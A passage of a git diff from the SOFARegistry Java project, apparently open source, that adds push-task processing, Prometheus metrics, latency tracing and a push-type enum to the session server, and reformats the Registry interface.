createPushData(SubDatum datum, Map subscriberMap) { + SubscriberUtils.getAndAssertHasSameScope(subscriberMap.values()); + // only supported 4.x + SubscriberUtils.assertClientVersion(subscriberMap.values(), BaseInfo.ClientVersion.StoreData); + + final Subscriber subscriber = subscriberMap.values().iterator().next(); + String dataId = datum.getDataId(); + String clientCell = sessionServerConfig.getClientCell(subscriber.getCell()); + Predicate zonePredicate = + ZonePredicate.zonePredicate(dataId, clientCell, subscriber.getScope(), sessionServerConfig); + + ReceivedData receivedData = + ReceivedDataConverter.getReceivedDataMulti( + datum, + subscriber.getScope(), + Lists.newArrayList(subscriberMap.keySet()), + clientCell, + zonePredicate); + receivedData.setVersion(datum.getVersion()); + final Byte serializerIndex = subscriber.getSourceAddress().getSerializerIndex(); + if (serializerIndex != null && URL.PROTOBUF == serializerIndex.byteValue()) { + return ReceivedDataConvertor.convert2Pb(receivedData); + } + return receivedData; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushMetrics.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushMetrics.java new file mode 100644 index 000000000..3f1472522 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushMetrics.java @@ -0,0 +1,107 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import io.prometheus.client.Counter; + +public final class PushMetrics { + private PushMetrics() {} + + static final class Fetch { + static final Counter CHANGE_TASK_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("change_task_total") + .help("change task") + .register(); + + static final Counter CHANGE_TASK_EXEC_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("change_task_exec_total") + .help("change task exec") + .register(); + static final Counter REGISTER_TASK_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("register_task_total") + .help("register task") + .register(); + static final Counter PUSH_EMPTY_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("empty_task_total") + .help("empty task") + .register(); + static final Counter PUSH_TEMP_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("temp_task_total") + .help("temp task") + .register(); + + private static final Counter CACHE_COUNTER = + Counter.build() + .namespace("session") + .subsystem("fetch") + .name("cache_total") + .help(" cache") + .labelNames("hit") + .register(); + + static final Counter.Child CACHE_HIT_COUNTER = CACHE_COUNTER.labels("Y"); + static final Counter.Child CACHE_MISS_COUNTER = CACHE_COUNTER.labels("N"); + } + + static final class Push { + private static final Counter PENDING_COUNTER = + Counter.build() + .namespace("session") + .subsystem("push") + .name("pending_total") + .help("pending fetch") + .labelNames("type") + .register(); + static final Counter.Child PENDING_REPLACE_COUNTER = PENDING_COUNTER.labels("replace"); + static final Counter.Child PENDING_NEW_COUNTER = PENDING_COUNTER.labels("new"); + static final Counter.Child PENDING_SKIP_COUNTER = PENDING_COUNTER.labels("skip"); + + static final Counter COMMIT_COUNTER = + Counter.build() + .namespace("session") + .subsystem("push") + .name("fire_commit_total") + .help("commit task") + .register(); + private static final Counter PUSH_CLIENT_COUNTER = + Counter.build() + .namespace("session") + .subsystem("push") + .name("push_client_total") + .help("push client task") + .labelNames("type") + .register(); + static final Counter.Child PUSH_CLIENT_PUSHING_COUNTER = PUSH_CLIENT_COUNTER.labels("I"); + static final Counter.Child PUSH_CLIENT_SUCCESS_COUNTER = PUSH_CLIENT_COUNTER.labels("Y"); + static final Counter.Child PUSH_CLIENT_FAIL_COUNTER = PUSH_CLIENT_COUNTER.labels("N"); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushProcessor.java new file mode 100644 index 000000000..5513b5077 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushProcessor.java @@ -0,0 +1,620 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import static com.alipay.sofa.registry.server.session.push.PushMetrics.Push.*; + +import com.alipay.remoting.rpc.exception.InvokeTimeoutException; +import com.alipay.sofa.registry.common.model.SubscriberUtils; +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; +import com.alipay.sofa.registry.task.KeyedThreadPoolExecutor; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; +import com.alipay.sofa.registry.trace.TraceID; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.OsUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.net.InetSocketAddress; +import java.util.*; +import java.util.concurrent.Executor; +import java.util.concurrent.RejectedExecutionHandler; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +public class PushProcessor { + private static final Logger LOGGER = LoggerFactory.getLogger(PushProcessor.class); + + private KeyedThreadPoolExecutor pushExecutor; + final Map pendingTasks = Maps.newConcurrentMap(); + private final Lock pendingLock = new ReentrantLock(); + + final Map pushingTasks = Maps.newConcurrentMap(); + + @Autowired SessionServerConfig sessionServerConfig; + + @Autowired PushDataGenerator pushDataGenerator; + + @Autowired ClientNodeService clientNodeService; + + final WatchDog watchDog = new WatchDog(); + + private final ThreadPoolExecutor pushCallbackExecutor = + MetricsableThreadPoolExecutor.newExecutor( + "PushCallback", OsUtils.getCpuCount() * 4, 20000, new DiscardRunHandler()); + + @PostConstruct + public void init() { + pushExecutor = + new KeyedThreadPoolExecutor( + "PushExecutor", + sessionServerConfig.getPushTaskExecutorPoolSize(), + sessionServerConfig.getPushTaskExecutorQueueSize()); + ConcurrentUtils.createDaemonThread("PushWatchDog", watchDog).start(); + } + + private boolean firePush(PushTask pushTask) { + PendingTaskKey key = pushTask.pendingKeyOf(); + if (pendingTasks.putIfAbsent(key, pushTask) == null) { + // fast path + if (pushTask.pushCause.pushType.noDelay) { + watchDog.wakeup(); + } + PENDING_NEW_COUNTER.inc(); + return true; + } + boolean skip = false; + PushTask prev = null; + pendingLock.lock(); + try { + prev = pendingTasks.get(key); + if (prev == null) { + pendingTasks.put(key, pushTask); + PENDING_NEW_COUNTER.inc(); + } else if (pushTask.afterThan(prev)) { + // update the expireTimestamp as prev's, avoid the push block by the continues fire + pushTask.expireTimestamp = prev.expireTimestamp; + pendingTasks.put(key, pushTask); + PENDING_REPLACE_COUNTER.inc(); + } else { + skip = true; + } + } finally { + pendingLock.unlock(); + } + if (!skip) { + if (pushTask.pushCause.pushType.noDelay) { + watchDog.wakeup(); + } + return true; + } else { + PENDING_SKIP_COUNTER.inc(); + LOGGER.info( + "[SkipPending] key={}, prev={}, {}, ver={}, now={}, ver={}", + key, + prev.taskID, + prev.pushingTaskKey, + prev.datum.getVersion(), + pushTask.taskID, + pushTask.datum.getVersion()); + return false; + } + } + + protected List createPushTask( + PushCause pushCause, + InetSocketAddress addr, + Map subscriberMap, + SubDatum datum) { + PushTask pushTask = new PushTask(pushCause, addr, subscriberMap, datum); + // set expireTimestamp, wait to merge to debouncing + pushTask.expireAfter(sessionServerConfig.getPushDataTaskDebouncingMillis()); + return Collections.singletonList(pushTask); + } + + void firePush( + PushCause pushCause, + InetSocketAddress addr, + Map subscriberMap, + SubDatum datum) { + List fires = createPushTask(pushCause, addr, subscriberMap, datum); + for (PushTask task : fires) { + boolean fire = firePush(task); + LOGGER.info("fire push={}, {}", fire, task); + } + } + + private boolean commitTask(PushTask task) { + try { + // keyed by pushingKey: client.addr && dataInfoId + pushExecutor.execute(task.pushingTaskKey, task); + COMMIT_COUNTER.inc(); + return true; + } catch (Throwable e) { + LOGGER.error("failed to exec push task {},{}", task.taskID, task.pushingTaskKey, e); + return false; + } + } + + final class WatchDog extends WakeUpLoopRunnable { + + @Override + public void runUnthrowable() { + watchCommit(); + } + + @Override + public int getWaitingMillis() { + return 100; + } + } + + List watchCommit() { + if (sessionServerConfig.isStopPushSwitch()) { + // stop push, clean the task + pendingLock.lock(); + try { + pendingTasks.clear(); + } finally { + pendingLock.unlock(); + } + return Collections.emptyList(); + } + List pending = transferAndMerge(); + List committed = Lists.newArrayListWithCapacity(pending.size()); + LOGGER.info("process push tasks {}", pending.size()); + for (PushTask task : pending) { + if (commitTask(task)) { + committed.add(task); + } + } + return committed; + } + + private List transferAndMerge() { + List pending = Lists.newArrayList(); + final long now = System.currentTimeMillis(); + pendingLock.lock(); + try { + final Iterator> it = pendingTasks.entrySet().iterator(); + while (it.hasNext()) { + Map.Entry e = it.next(); + PushTask task = e.getValue(); + // no delay or expire, push immediately + if (task.pushCause.pushType.noDelay || task.expireTimestamp <= now) { + pending.add(task); + it.remove(); + } + } + } finally { + pendingLock.unlock(); + } + return pending; + } + + boolean checkPushing(PushTask task) { + final PushingTaskKey pushingTaskKey = task.pushingTaskKey; + // check the pushing task + final PushTask prev = pushingTasks.get(pushingTaskKey); + if (prev == null) { + return true; + } + final long now = System.currentTimeMillis(); + final long span = now - prev.pushTimestamp; + if (span > sessionServerConfig.getClientNodeExchangeTimeoutMillis() * 3) { + // this happens when the callbackExecutor is too busy and the callback task is discarded + // force to remove the prev task + final boolean cleaned = pushingTasks.remove(pushingTaskKey) != null; + LOGGER.warn( + "[prevPushTooLong] {}, clean={}, prev={}, now={}", + pushingTaskKey, + cleaned, + prev.taskID, + task.taskID); + if (cleaned) { + prev.trace.finishPush(PushTrace.PushStatus.Busy, now).print(); + } + return true; + } + // task after the prev, but prev.pushClient not callback, retry + retry(task, "waiting"); + return false; + } + + private boolean retry(PushTask task, String reason) { + task.retryCount++; + final int retry = task.retryCount; + if (retry <= sessionServerConfig.getPushTaskRetryTimes()) { + final int backoffMillis = getRetryBackoffTime(retry); + task.expireAfter(backoffMillis); + if (firePush(task)) { + LOGGER.info( + "add retry for {}, {}, {}, retry={}, backoff={}", + reason, + task.taskID, + task.pushingTaskKey, + retry, + backoffMillis); + return true; + } + } + LOGGER.info( + "skip retry for {}, {}, {}, retry={}", reason, task.taskID, task.pushingTaskKey, retry); + return false; + } + + // check push empty, some group maybe could not tolerate push empty + protected boolean interruptOnPushEmpty( + SubDatum datum, PushCause pushCause, Subscriber sub, InetSocketAddress addr) { + return false; + } + + boolean doPush(PushTask task) { + if (sessionServerConfig.isStopPushSwitch()) { + return false; + } + + try { + if (!checkPushing(task)) { + return false; + } + if (interruptOnPushEmpty(task.datum, task.pushCause, task.subscriber, task.addr)) { + return false; + } + Object data = task.createPushData(); + task.updatePushTimestamp(); + task.trace.startPush( + SubscriberUtils.getMaxPushedVersion(task.dataCenter, task.subscriberMap.values()), + task.pushTimestamp); + pushingTasks.put(task.pushingTaskKey, task); + clientNodeService.pushWithCallback( + data, task.subscriber.getSourceAddress(), new PushClientCallback(task)); + PUSH_CLIENT_PUSHING_COUNTER.inc(); + LOGGER.info("{}, pushing {}", task.taskID, task.pushingTaskKey); + return true; + } catch (Throwable e) { + handleDoPushException(task, e); + } + return false; + } + + void handleDoPushException(PushTask task, Throwable e) { + // try to delete self + boolean cleaned = pushingTasks.remove(task.pushingTaskKey) != null; + task.trace.finishPush(PushTrace.PushStatus.Fail, System.currentTimeMillis()).print(); + if (e instanceof RequestChannelClosedException) { + LOGGER.error( + "{}, failed to pushing {}, cleaned={}, {}", + task.taskID, + task.pushingTaskKey, + cleaned, + e.getMessage()); + return; + } + LOGGER.error( + "{}, failed to pushing {}, cleaned={}", task.taskID, task.pushingTaskKey, cleaned, e); + } + + class PushTask implements Runnable { + final TraceID taskID; + final long createTimestamp = System.currentTimeMillis(); + volatile long expireTimestamp; + volatile long pushTimestamp; + + final PushCause pushCause; + final String dataCenter; + final SubDatum datum; + final InetSocketAddress addr; + final Map subscriberMap; + final Subscriber subscriber; + int retryCount; + + final PushingTaskKey pushingTaskKey; + final PushTrace trace; + + PushTask( + PushCause pushCause, + InetSocketAddress addr, + Map subscriberMap, + SubDatum datum) { + this.taskID = TraceID.newTraceID(); + this.pushCause = pushCause; + this.dataCenter = datum.getDataCenter(); + this.datum = datum; + this.addr = addr; + this.subscriberMap = subscriberMap; + this.subscriber = subscriberMap.values().iterator().next(); + this.trace = + PushTrace.trace( + datum, + addr, + subscriber.getAppName(), + pushCause, + subscriberMap.size(), + SubscriberUtils.getMaxRegisterTimestamp(subscriberMap.values())); + this.pushingTaskKey = + new PushingTaskKey( + subscriber.getDataInfoId(), + addr, + subscriber.getScope(), + subscriber.getClientVersion()); + } + + protected Object createPushData() { + return pushDataGenerator.createPushData(datum, subscriberMap); + } + + void expireAfter(long intervalMs) { + this.expireTimestamp = System.currentTimeMillis() + intervalMs; + } + + boolean afterThan(PushTask t) { + return datum.getVersion() > t.datum.getVersion(); + } + + void updatePushTimestamp() { + this.pushTimestamp = System.currentTimeMillis(); + } + + @Override + public void run() { + doPush(this); + } + + PendingTaskKey pendingKeyOf() { + return new PendingTaskKey( + dataCenter, addr, subscriber.getDataInfoId(), subscriberMap.keySet()); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(512); + sb.append("PushTask{") + .append(subscriber.getDataInfoId()) + .append(",ID=") + .append(taskID) + .append(",createT=") + .append(createTimestamp) + .append(",expireT=") + .append(expireTimestamp) + .append(",DC=") + .append(dataCenter) + .append(",ver=") + .append(datum.getVersion()) + .append(",addr=") + .append(addr) + .append(",scope=") + .append(subscriber.getScope()) + .append(",subIds=") + .append(subscriberMap.keySet()) + .append(",subCtx=") + .append(subscriber.printPushContext()) + .append(",retry=") + .append(retryCount); + return sb.toString(); + } + } + + final class PushClientCallback implements CallbackHandler { + final PushTask pushTask; + final PushingTaskKey pushingTaskKey; + long finishedTimestamp; + + PushClientCallback(PushTask pushTask) { + this.pushTask = pushTask; + this.pushingTaskKey = pushTask.pushingTaskKey; + } + + @Override + public void onCallback(Channel channel, Object message) { + this.finishedTimestamp = System.currentTimeMillis(); + PUSH_CLIENT_SUCCESS_COUNTER.inc(); + boolean cleaned = false; + try { + for (Subscriber subscriber : pushTask.subscriberMap.values()) { + if (!subscriber.checkAndUpdateVersion(pushTask.dataCenter, pushTask.datum.getVersion())) { + LOGGER.info( + "PushY, but failed to updateVersion, {}, {}", + pushTask.taskID, + pushTask.pushingTaskKey); + } + } + } catch (Throwable e) { + LOGGER.error("error push.onCallback, {}, {}", pushTask.taskID, pushTask.pushingTaskKey, e); + } finally { + cleaned = pushingTasks.remove(pushingTaskKey, pushTask); + } + this.pushTask.trace.finishPush(PushTrace.PushStatus.OK, this.finishedTimestamp).print(); + LOGGER.info( + "PushY, clean record={}, span={}/{}, {}, {}", + cleaned, + pushSpanMillis(), + totalSpanMillis(), + pushTask.taskID, + pushTask.pushingTaskKey); + } + + @Override + public void onException(Channel channel, Throwable exception) { + this.finishedTimestamp = System.currentTimeMillis(); + PUSH_CLIENT_FAIL_COUNTER.inc(); + boolean cleaned = false; + try { + cleaned = pushingTasks.remove(pushingTaskKey, pushTask); + if (channel.isConnected()) { + retry(pushTask, "callbackErr"); + } else { + LOGGER.info("PushN, channel closed, {}, {}", pushTask.taskID, pushingTaskKey); + } + } catch (Throwable e) { + LOGGER.error("error push.onException, {}, {}", pushTask.taskID, pushingTaskKey, e); + } + if (exception instanceof InvokeTimeoutException) { + if (cleaned) { + this.pushTask + .trace + .finishPush(PushTrace.PushStatus.Timeout, this.finishedTimestamp) + .print(); + } + LOGGER.error( + "PushN, timeout, clean record={}, span={}/{}, {}, {}", + cleaned, + pushSpanMillis(), + totalSpanMillis(), + pushTask.taskID, + pushingTaskKey); + } else { + if (cleaned) { + this.pushTask.trace.finishPush(PushTrace.PushStatus.Fail, this.finishedTimestamp).print(); + } + LOGGER.error( + "PushN, clean record={}, span={}/{}, {}, {}", + cleaned, + pushSpanMillis(), + totalSpanMillis(), + pushTask.taskID, + pushingTaskKey, + exception); + } + } + + long pushSpanMillis() { + return finishedTimestamp - pushTask.pushTimestamp; + } + + long totalSpanMillis() { + return finishedTimestamp - pushTask.createTimestamp; + } + + @Override + public Executor getExecutor() { + return pushCallbackExecutor; + } + } + + static final class PendingTaskKey { + final String dataCenter; + final String dataInfoId; + final InetSocketAddress addr; + final Set subscriberIds; + + PendingTaskKey( + String dataCenter, InetSocketAddress addr, String dataInfoId, Set subscriberIds) { + this.dataCenter = dataCenter; + this.dataInfoId = dataInfoId; + this.addr = addr; + this.subscriberIds = subscriberIds; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + PendingTaskKey pendingTaskKey = (PendingTaskKey) o; + return Objects.equals(addr, pendingTaskKey.addr) + && Objects.equals(dataInfoId, pendingTaskKey.dataInfoId) + && Objects.equals(dataCenter, pendingTaskKey.dataCenter) + && Objects.equals(subscriberIds, pendingTaskKey.subscriberIds); + } + + @Override + public int hashCode() { + return Objects.hash(dataCenter, addr, dataInfoId, subscriberIds); + } + + @Override + public String toString() { + return "PendingKey{" + + dataInfoId + + ',' + + dataCenter + + ',' + + addr + + ", subscriberIds=" + + subscriberIds + + '}'; + } + } + + static final class PushingTaskKey { + final InetSocketAddress addr; + final String dataInfoId; + final ScopeEnum scopeEnum; + final BaseInfo.ClientVersion clientVersion; + + PushingTaskKey( + String dataInfoId, + InetSocketAddress addr, + ScopeEnum scopeEnum, + BaseInfo.ClientVersion clientVersion) { + this.dataInfoId = dataInfoId; + this.addr = addr; + this.scopeEnum = scopeEnum; + this.clientVersion = clientVersion; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + PushingTaskKey that = (PushingTaskKey) o; + return Objects.equals(addr, that.addr) + && Objects.equals(dataInfoId, that.dataInfoId) + && scopeEnum == that.scopeEnum + && clientVersion == that.clientVersion; + } + + @Override + public int hashCode() { + return Objects.hash(addr, dataInfoId, scopeEnum, clientVersion); + } + + @Override + public String toString() { + return "PushingKey{" + dataInfoId + ',' + scopeEnum + ',' + addr + '}'; + } + } + + static final class DiscardRunHandler implements RejectedExecutionHandler { + public void rejectedExecution(Runnable r, ThreadPoolExecutor e) { + LOGGER.info("[pushCallbackBusy]"); + } + } + + int getRetryBackoffTime(int retry) { + final int initialSleepTime = sessionServerConfig.getPushDataTaskRetryFirstDelayMillis(); + if (retry == 0) { + return initialSleepTime; + } + int increment = sessionServerConfig.getPushDataTaskRetryIncrementDelayMillis(); + int result = initialSleepTime + (increment * (retry - 1)); + return result >= 0L ? result : 0; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushTrace.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushTrace.java new file mode 100644 index 000000000..db773cac4 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushTrace.java @@ -0,0 +1,202 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.SubPublisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Lists; +import com.google.common.primitives.Longs; +import java.net.InetSocketAddress; +import java.util.Collections; +import java.util.Comparator; +import java.util.List; + +public final class PushTrace { + private static final Logger LOGGER = LoggerFactory.getLogger("PUSH-TRACE"); + + private final SubDatum datum; + final long pushCommitTimestamp = System.currentTimeMillis(); + + private long subscriberPushedVersion; + private final String subApp; + private final int subNum; + private final long subRegTimestamp; + private final InetSocketAddress subAddress; + final PushCause pushCause; + + private long pushStartTimestamp; + + private PushStatus status; + private long pushFinishTimestamp; + + // push.finish- first.newly.publisher.registryTs + long datumModifyDelayMillis; + // push.finish - datum.versionTs + long datumTotalDelayMillis; + // exec.start - datum.modify + long datumPushTriggerSpanMillis; + // commit - exec.start + long datumPushCommitSpanMillis; + // push.start - fetch.finish + long datumPushStartSpanMillis; + // push.finish - push.start + long datumPushFinishSpanMillis; + + // push.start - exec.start + long datumPushSessionSpanMillis; + + // pub after last push + int newPublisherNum; + // push.finish - firstPub.registerTimestamp + long firstPubPushDelayMillis; + // push.finish - lastPub.registerTimestamp + long lastPubPushDelayMillis; + + private PushTrace( + SubDatum datum, + InetSocketAddress address, + String subApp, + PushCause pushCause, + int subNum, + long subRegTimestamp) { + this.datum = datum; + this.pushCause = pushCause; + this.subAddress = address; + this.subApp = subApp; + this.subNum = subNum; + this.subRegTimestamp = subRegTimestamp; + } + + public static PushTrace trace( + SubDatum datum, + InetSocketAddress address, + String subApp, + PushCause pushCause, + int subNum, + long subRegTimestamp) { + return new PushTrace(datum, address, subApp, pushCause, subNum, subRegTimestamp); + } + + public PushTrace startPush(long subscriberPushedVersion, long startPushTimestamp) { + this.subscriberPushedVersion = subscriberPushedVersion; + this.pushStartTimestamp = startPushTimestamp; + return this; + } + + public PushTrace finishPush(PushStatus status, long finishPushTimestamp) { + this.status = status; + this.pushFinishTimestamp = finishPushTimestamp; + return this; + } + + public void print() { + calc(); + LOGGER.info( + "{},{},{},{},{},cause={},pubNum={},pubBytes={},pubNew={},delay={},{},{},{},{},session={},cliIO={},firstPubDelay={},lastPubDelay={},subNum={},addr={}", + status, + datum.getDataInfoId(), + datum.getVersion(), + subApp, + datum.getDataCenter(), + pushCause.pushType, + datum.getPublishers().size(), + datum.getDataBoxBytes(), + newPublisherNum, + datumModifyDelayMillis, + datumTotalDelayMillis, + datumPushTriggerSpanMillis, + datumPushCommitSpanMillis, + datumPushStartSpanMillis, + datumPushSessionSpanMillis, + datumPushFinishSpanMillis, + firstPubPushDelayMillis, + lastPubPushDelayMillis, + subNum, + subAddress); + } + + private void calc() { + // try find the earliest and the latest publisher after the subPushedVersion + // that means the modify after last push, but this could not handle the publisher.remove + this.datumTotalDelayMillis = pushFinishTimestamp - pushCause.triggerTimestamp; + this.datumPushTriggerSpanMillis = + Math.max(pushCause.startTimestamp - pushCause.triggerTimestamp, 0); + this.datumPushCommitSpanMillis = pushCommitTimestamp - pushCause.startTimestamp; + this.datumPushStartSpanMillis = pushStartTimestamp - pushCommitTimestamp; + this.datumPushFinishSpanMillis = pushFinishTimestamp - pushStartTimestamp; + this.datumPushSessionSpanMillis = pushStartTimestamp - pushCause.startTimestamp; + final List publishers = datum.getPublishers(); + final long lastPushTimestamp = + subscriberPushedVersion <= ValueConstants.DEFAULT_NO_DATUM_VERSION + ? subRegTimestamp + : DatumVersionUtil.getRealTimestamp(subscriberPushedVersion); + final List news = findNewPublishers(publishers, lastPushTimestamp); + final SubPublisher first = news.isEmpty() ? null : news.get(0); + final SubPublisher last = news.isEmpty() ? null : news.get(news.size() - 1); + this.newPublisherNum = news.size(); + this.firstPubPushDelayMillis = + first == null ? 0 : pushFinishTimestamp - first.getRegisterTimestamp(); + this.lastPubPushDelayMillis = + last == null ? 0 : pushFinishTimestamp - last.getRegisterTimestamp(); + + this.datumModifyDelayMillis = datumTotalDelayMillis; + if (pushCause.pushType == PushType.Sub && first != null) { + // if sub, use first.publisher.registerTs as modifyTs + datumModifyDelayMillis = firstPubPushDelayMillis; + } + } + + enum PushStatus { + OK, + Fail, + Timeout, + Busy, + } + + static List findNewPublishers( + List publishers, long minRegisterTimestamp) { + if (publishers.isEmpty()) { + return Collections.emptyList(); + } + List news = Lists.newArrayListWithCapacity(128); + for (SubPublisher p : publishers) { + if (p.getRegisterTimestamp() > minRegisterTimestamp) { + news.add(p); + } + } + news.sort( + new Comparator() { + @Override + public int compare(SubPublisher o1, SubPublisher o2) { + return Longs.compare(o1.getRegisterTimestamp(), o2.getRegisterTimestamp()); + } + }); + return news; + } + + static long getTriggerPushTimestamp(SubDatum datum) { + long ts = + datum.getVersion() <= ValueConstants.DEFAULT_NO_DATUM_VERSION + ? System.currentTimeMillis() + : DatumVersionUtil.getRealTimestamp(datum.getVersion()); + return ts; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushType.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushType.java new file mode 100644 index 000000000..64126873f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/push/PushType.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +public enum PushType { + Sub(false), + Reg(true), + Temp(true), + Empty(true); + + public final boolean noDelay; + + private PushType(boolean noDelay) { + this.noDelay = noDelay; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/Registry.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/Registry.java index 6d4920f14..20d1861af 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/Registry.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/Registry.java @@ -16,49 +16,54 @@ */ package com.alipay.sofa.registry.server.session.registry; +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.store.StoreData; - import java.util.List; /** - * * @author shangyu.wh * @version $Id: SessionRegistry.java, v 0.1 2017-11-27 19:49 shangyu.wh Exp $ */ public interface Registry { - /** - * register new publisher or subscriber data - * - * @param data - */ - void register(StoreData data); + /** + * register new publisher or subscriber data + * + * @param data + */ + void register(StoreData data); + + /** + * cancel publisher or subscriber data by client ip address and port(ip:port),one ip address has + * more than one processId when disconnection between client node and session node,disconnect + * event fire remove all pub and sub info on session and data node this function always use in + * Console manage Client node list,input ip list must transform to connectId through connect + * manage + * + * @param connectIds + */ + void cancel(List connectIds); - /** - * cancel publisher or subscriber data by client ip address and port(ip:port),one ip address has more than one processId - * when disconnection between client node and session node,disconnect event fire remove all pub and sub info on session and data node - * this function always use in Console manage Client node list,input ip list must transform to connectId through connect manage - * - * @param connectIds - */ - void cancel(List connectIds); + /** + * remove publisher or subscriber data by client ip address and port(ip:port) this function always + * use in rest api Console manage ,the run mode is standard remove subscriber data will push empty + * datum to some one who has dataInfoId begin with pushEmptyDataDataIdPrefixes config + * + * @param connectIds + */ + void remove(List connectIds); - /** - * message mode com.alipay.sofa.registry.client.provider for client node to unregister single subscriber or publisher data - * - * @param data - */ - void unRegister(StoreData data); + /** + * message mode com.alipay.sofa.registry.client.provider for client node to unregister single + * subscriber or publisher data + * + * @param data + */ + void unRegister(StoreData data); - /** - * Timing tasks to send all subscriber dataInfoId version to data, - * Select higher version data push to client node - * - */ - void fetchChangData(); + /** for fetchChangData first invoke */ + void fetchChangDataProcess(); - /** - * for fetchChangData first invoke - */ - void fetchChangDataProcess(); -} \ No newline at end of file + /** for scheduler clean no connect client */ + void cleanClientConnect(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/SessionRegistry.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/SessionRegistry.java index fe40e3a48..ed8b77cd8 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/SessionRegistry.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/registry/SessionRegistry.java @@ 